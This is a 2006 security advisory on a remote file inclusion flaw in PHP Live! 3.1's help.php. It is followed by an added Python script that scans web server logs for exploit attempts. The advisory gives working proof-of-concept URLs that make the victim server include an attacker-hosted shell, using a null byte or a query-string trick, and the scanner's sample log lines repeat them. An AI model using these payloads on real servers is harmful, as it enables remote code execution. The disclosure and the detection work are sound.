phplive31-rfi.txt

09 Oct 2006 | Reported by Paisterist | Type: packetstorm | Source: packetstormsecurity.com

PHP Live! 3.1 help.php Remote File Inclusion vulnerability. PHP Live! enables live customer support communication. Risk: High.

Code
`/*  
--------------------------------------------------------  
[N]eo [S]ecurity [T]eam [NST] - Advisory #25 - 08/10/06  
--------------------------------------------------------  
Program: PHP Live!  
Homepage: http://www.phplivesupport.com/  
Vulnerable Versions: 3.1 and prior  
Risk: High!  
Impact: Critical Risk  
  
-==PHP Live! <= 3.1 help.php Remote File Inclusion vulnerability==-  
---------------------------------------------------------  
  
- Description  
---------------------------------------------------------  
PHP Live! enables live help and live customer support communication directly  
from your website. With PHP  
Live!, you can provide one-on-one chat assistance in real-time, answer  
visitor questions and add that extra human touch to  
your website.  
  
- Tested  
---------------------------------------------------------  
localhost & many sites  
  
- Exploitation  
---------------------------------------------------------  
  
Vulnerable code:  
  
==[ help.php 30 ]=============================  
[...]  
<?php $css_path = ( !isset( $css_path ) ) ? $css_path = "./" : $css_path ;  
include_once( $css_path."css/default.php" ) ; ?>  
[...]  
==[ end help.php ]============================  
  
As we can see, this is an arbitrary file inclusion: a file from another  
server can be included, and its PHP code is executed on the victim's  
server.  
  
Proof of Concept:  
http://victim.com/phplive/help.php?css_path=http://www.attacker.com/shell.foo%00  
  
We put a NULL byte at the end of the string because include_once() treats a  
null byte as the end of the string. This way,  
"css/default.php" does not appear at the end of the variable.  
  
If you don't want to use a NULL byte, you can do something like:  
  
http://victim.com/phplive/help.php?css_path=http://www.attacker.com/shell.foo?foo=  
  
This way, $foo contains css/default.php in the attacker's script.  
  
  
Note: this vulnerability is present only if register_globals is turned on.  
  
There are a lot of Local and Remote File Inclusion vulnerabilities in this  
script... but there is no reason to publish them.  
  
- How to fix it? More information?  
--------------------------------------------------------  
Visit our forum to know how to fix it or to get more information.  
http://www.neosecurityteam.net/foro/  
  
- References  
--------------------------------------------------------  
http://www.neosecurityteam.net/index.php?action=advisories&id=25  
  
- Credits  
--------------------------------------------------------  
Discovered by Paisterist -> paisterist.nst [at] gmail [dot] com  
  
[N]eo [S]ecurity [T]eam [NST] - http://www.neosecurityteam.net/  
  
  
- Greets  
--------------------------------------------------------  
HaCkZaTaN  
K4P0  
Daemon21  
Link  
0m3gA_x  
LINUX  
m0rpheus  
nikyt0x  
  
Argentina, Colombia, Chile, Bolivia, Uruguay EXISTS!!  
  
@@@@'''@@@@'@@@@@@@@@'@@@@@@@@@@@  
'@@@@@''@@'@@@''''''''@@''@@@''@@  
'@@'@@@@@@''@@@@@@ @@@'''''@@@  
'@@'''@@@@'''''''''@@@''''@@@  
@@@@''''@@'@@@@@@@@@@''''@@@@@  
  
/* EOF *  
`
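
For defenders reviewing web server logs, the following is an added example (not part of the NST advisory or of PHP Live!) that flags help.php requests whose css_path value carries a URL scheme, a null byte, or a trailing query string, the three traits of the requests described above. The log lines, IP addresses and the attacker.example host are constructed sample data, and the function names are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request line inside a common/combined-format access log entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A URL scheme at the start of the value (http://, ftp://, ...).
SCHEME = re.compile(r"^[a-z][a-z0-9+.\-]*://", re.I)

# Constructed sample log lines (documentation IPs and hosts).
SAMPLE_LOG = [
    '192.0.2.10 - - [09/Oct/2006:10:00:01 +0000] "GET /phplive/help.php?dept=1 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [09/Oct/2006:10:02:13 +0000] "GET /phplive/help.php?css_path=http://attacker.example/shell.foo%00 HTTP/1.1" 200 812',
    '192.0.2.44 - - [09/Oct/2006:10:02:20 +0000] "GET /phplive/help.php?css_path=http://attacker.example/shell.foo?foo= HTTP/1.1" 200 812',
    '192.0.2.11 - - [09/Oct/2006:10:03:00 +0000] "GET /phplive/index.php?ref=http://example.org/ HTTP/1.1" 200 900',
]

def classify_css_path(value):
    """Return the reasons a decoded css_path value is suspicious."""
    reasons = []
    if SCHEME.match(value):
        reasons.append("remote-scheme")      # include target on another host
    if "\x00" in value:
        reasons.append("null-byte")          # cuts off "css/default.php"
    if "?" in value or "#" in value:
        reasons.append("suffix-truncation")  # pushes the suffix into a query
    return reasons

def scan(lines):
    """Return (line_no, css_path, reasons) for suspicious help.php requests.

    Only the query string is inspected; with register_globals on, css_path
    can also arrive in a POST body or cookie, which access logs do not show.
    """
    hits = []
    for line_no, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if not url.path.lower().endswith("/help.php"):
            continue
        for key, value in parse_qsl(url.query, keep_blank_values=True):
            reasons = classify_css_path(value) if key == "css_path" else []
            if reasons:
                hits.append((line_no, value, reasons))
    return hits

if __name__ == "__main__":
    for line_no, value, reasons in scan(SAMPLE_LOG):
        print(line_no, repr(value), ",".join(reasons))
```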
